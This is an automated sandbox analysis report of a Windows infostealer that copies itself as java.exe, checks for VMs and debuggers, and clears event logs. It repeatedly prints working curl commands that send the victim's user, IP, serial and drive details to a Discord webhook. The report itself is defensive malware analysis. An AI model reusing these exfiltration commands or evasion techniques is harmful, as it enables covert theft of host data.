Source: classification engineClassification label: mal76.expl.evad.winEXE@16/4@2/3
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC3EC9 CreateToolhelp32Snapshot,memset,Process32FirstW,_wcsicmp,Process32NextW,CloseHandle,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,0_2_00007FF670FC3EC9
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC4990 CoInitializeEx,CoCreateInstance,VariantInit,VariantInit,VariantInit,VariantInit,VariantClear,VariantClear,VariantClear,VariantClear,SysAllocString,SysFreeString,SysAllocString,SysFreeString,CoUninitialize,SysAllocString,SysFreeString,SysAllocString,SysFreeString,SysAllocString,VariantInit,VariantInit,SysAllocString,SysFreeString,VariantClear,VariantClear,VariantClear,CoUninitialize,0_2_00007FF670FC4990
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeFile created: C:\Users\user\AppData\Local\java.exeJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5000:120:WilError_03
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Jx6bD8nM4qW9sL3v.exeReversingLabs: Detection: 47%
Source: Jx6bD8nM4qW9sL3v.exeVirustotal: Detection: 54%
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeFile read: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe "C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exe"
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.org
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
Source: unknownProcess created: C:\Users\user\AppData\Local\java.exe C:\Users\user\AppData\Local\java.exe
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.org
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.org
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhm
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhmJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhmJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: msvcp140.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: taskschd.dllJump to behavior
Source: C:\Users\user\AppData\Local\java.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\curl.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Jx6bD8nM4qW9sL3v.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,0_2_00007FF670FC3FEA
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeFile created: C:\Users\user\AppData\Local\java.exeJump to dropped file
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC42B0 RtlAdjustPrivilege,NtRaiseHardError,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,GetConsoleWindow,GetSystemMenu,RemoveMenu,GetModuleFileNameW,GetFileAttributesW,SetFileAttributesW,GdiplusStartup,CoUninitialize,OpenEventLogW,ClearEventLogW,CloseEventLog,_invalid_parameter_noinfo_noreturn,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z@Z,0_2_00007FF670FC42B0

Malware Analysis System Evasion

barindex
Contain functionality to detect virtual machines
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VBox VBox VMware QEMU QEMU 0_2_00007FF670FC3EC9
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VMware QEMU QEMU 0_2_00007FF670FC4082
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VMware QEMU QEMU 0_2_00007FF670FC40AC
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VMware QEMU QEMU 0_2_00007FF670FC4130
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VMware QEMU QEMU 0_2_00007FF670FC3F89
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VBox VBox VMware QEMU QEMU 0_2_00007FF670FC3FEA
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: VMware VBox QEMU QEMU 0_2_00007FF670FC3E00
Source: C:\Users\user\AppData\Local\java.exeCode function: VMware QEMU QEMU 6_2_00007FF65E1F3F89
Source: C:\Users\user\AppData\Local\java.exeCode function: VBox VBox VMware QEMU QEMU 6_2_00007FF65E1F3FEA
Source: C:\Users\user\AppData\Local\java.exeCode function: VMware QEMU QEMU 6_2_00007FF65E1F40AC
Source: C:\Users\user\AppData\Local\java.exeCode function: VMware QEMU QEMU 6_2_00007FF65E1F4082
Source: C:\Users\user\AppData\Local\java.exeCode function: VMware QEMU QEMU 6_2_00007FF65E1F4130
Source: C:\Users\user\AppData\Local\java.exeCode function: VBox VBox VMware QEMU QEMU 6_2_00007FF65E1F3EC9
Source: C:\Users\user\AppData\Local\java.exeCode function: VMware VBox QEMU QEMU 6_2_00007FF65E1F3E00
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Jx6bD8nM4qW9sL3v.exe, java.exeBinary or memory string: OLLYDBG.EXE
Source: Jx6bD8nM4qW9sL3v.exe, java.exeBinary or memory string: X64DBG.EXE
Source: java.exe.0.drBinary or memory string: SECURITY CHECK FAILED!\JAVA.EXEJAVAUPDATER\JAVA PLATFORM SEAPPLICATIONSYSTEMSECURITYNTDLL.DLLNTQUERYINFORMATIONPROCESSOLLYDBG.EXEX64DBG.EXEX32DBG.EXEIDA64.EXEIDA.EXECHEATENGINE-X86_64.EXESYSTEM\CURRENTCONTROLSET\CONTROL\CI\POLICYDEBUGPOLICYVMWAREVBOXQEMUVIRTUALSYSTEM\HARDWARECONFIG\CURRENT\SYSTEMMANUFACTURERBAD CASTFALSETRUEMAP/SET TOO LONG] [JSON.EXCEPTION.FAILED TO CALCULATE DECODED SIZEFAILED TO DECODE BASE64 STRINGCREATEPIPE FAILEDCREATEPROCESS FAILEDCOLORTIMESTAMPFIELDSFOOTERTEXTNAMEVALUEINLINEIMAGEURLEMBEDS%Y-%M-%DT%H:%M:%S.000Z\"\\" CURL -H "CONTENT-TYPE: APPLICATION/JSON" -X POST -D "WEBHOOK SENT. RESPONSE: ERROR SENDING WEBHOOK: AHR0CHM6LY9KAXNJB3JKLMNVBS9HCGKVD2VIAG9VA3MVMTMYMTMYODYWMJC5MJQ2MDMZMC9ROUNRTVVXAFBTBKXBOFLDR0ZPV2NOMXFZBWQ4U3PFEKHWNVJJRNJJDVL4OFVXVTJIU0CZZMR3NGDYMUM3QVZOSLFOBQ==LOCAL USERSYSTEM NAMEIP ADDRESSSERIAL NUMBERPRODUCT VERSIONDRIVESNEW CLIENTCANNOT USE OPERATOR[] WITH A NUMERIC ARGUMENT WITH {}{
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC1780 GetLogicalDriveStringsA,memset,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA@XZ,GetDriveTypeA,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA@XZ,??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA@XZ,0_2_00007FF670FC1780
Source: java.exe.0.drBinary or memory string: VMware
Source: java.exe.0.drBinary or memory string: Security check failed!\java.exeJavaUpdater\Java Platform SEApplicationSystemSecurityntdll.dllNtQueryInformationProcessollydbg.exex64dbg.exex32dbg.exeida64.exeida.execheatengine-x86_64.exeSYSTEM\CurrentControlSet\Control\CI\PolicyDebugPolicyVMwareVBoxQEMUVirtualSYSTEM\HardwareConfig\Current\SystemManufacturerbad castfalsetruemap/set too long] [json.exception.Failed to calculate decoded sizeFailed to decode base64 stringCreatePipe failedCreateProcess failedcolortimestampfieldsfootertextnamevalueinlineimageurlembeds%Y-%m-%dT%H:%M:%S.000Z\"\\" curl -H "Content-Type: application/json" -X POST -d "Webhook sent. Response: Error sending webhook: aHR0cHM6Ly9kaXNjb3JkLmNvbS9hcGkvd2ViaG9va3MvMTMyMTMyODYwMjc5MjQ2MDMzMC9ROUNRTVVxaFBtbkxBOFlDR0ZpV2NOMXFzbWQ4U3pFekhWNVJjRnJJdVl4OFVXVTJiU0czZmR3NGdyMUM3QVZoSlFobQ==local usersystem nameip addressserial numberproduct versionDrivesNew clientcannot use operator[] with a numeric argument with {}{
Source: curl.exe, 00000003.00000003.2025355988.0000018EE9645000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.2033480984.0000015BFD285000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000009.00000003.2051214870.000002C6CC524000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.2059556756.00000269500F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC4082 GetCurrentProcess,CheckRemoteDebuggerPresent,0_2_00007FF670FC4082
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FCE324 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF670FCE324
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FC3FEA LoadLibraryA,GetProcAddress,FreeLibrary,GetCurrentProcess,NtQueryInformationProcess,FreeLibrary,0_2_00007FF670FC3FEA
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FCE324 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF670FCE324
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FCE050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF670FCE050
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeCode function: 0_2_00007FF670FCE4C8 SetUnhandledExceptionFilter,0_2_00007FF670FCE4C8
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1FE050 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF65E1FE050
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1FE4C8 SetUnhandledExceptionFilter,6_2_00007FF65E1FE4C8
Source: C:\Users\user\AppData\Local\java.exeCode function: 6_2_00007FF65E1FE324 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF65E1FE324
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:25.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhmJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\AppData\Local\java.exeProcess created: C:\Windows\System32\curl.exe curl -H "Content-Type: application/json" -X POST -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"C6553AFB\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"Windows 6.2 (Build 9200)\"},{\"inline\":false,\"name\":\"Drives\",\"value\":\"C: (Local) D: (CD-ROM)\"}],\"footer\":{\"text\":\"New client\"},\"timestamp\":\"2024-12-30T11:32:27.000Z\"}]}" https://discord.com/api/webhooks/1321328602792460330/Q9CQMUqhPmnLA8YCGFiWcN1qsmd8SzEzHV5RcFrIuYx8UWU2bSG3fdw4gr1C7AVhJQhmJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -s https://api.ipify.orgJump to behavior
Source: C:\Users\user\Desktop\Jx6bD8nM4qW9sL3v.exeProcess created: C:\Windows\System32\curl.exe curl -h "content-type: application/json" -x post -d "{\"embeds\":[{\"color\":16711680,\"fields\":[{\"inline\":false,\"name\":\"local user\",\"value\":\"user\"},{\"inline\":false,\"name\":\"system name\",\"value\":\"571345\"},{\"inline\":false,\"name\":\"ip address\",\"value\":\"8.46.123.189\"},{\"inline\":false,\"name\":\"serial number\",\"value\":\"c6553afb\"},{\"inline\":false,\"name\":\"product version\",\"value\":\"windows 6.2 (build 9200)\"},{\"inline\":false,\"name\":\"drives\",\"value\":\"c: (local) d: (cd-rom)\"}],\"footer\":{\"text\":\"new client\"},\"timestamp\":\"2024-12-30t11:32:25.000z\"}]}" https://discord.com/api/webhooks/1321328602792460330/q9cqmuqhpmnla8ycgfiwcn1qsmd8szezhv5rcfriuyx8uwu2bsg3fdw4gr1c7avhjqhm
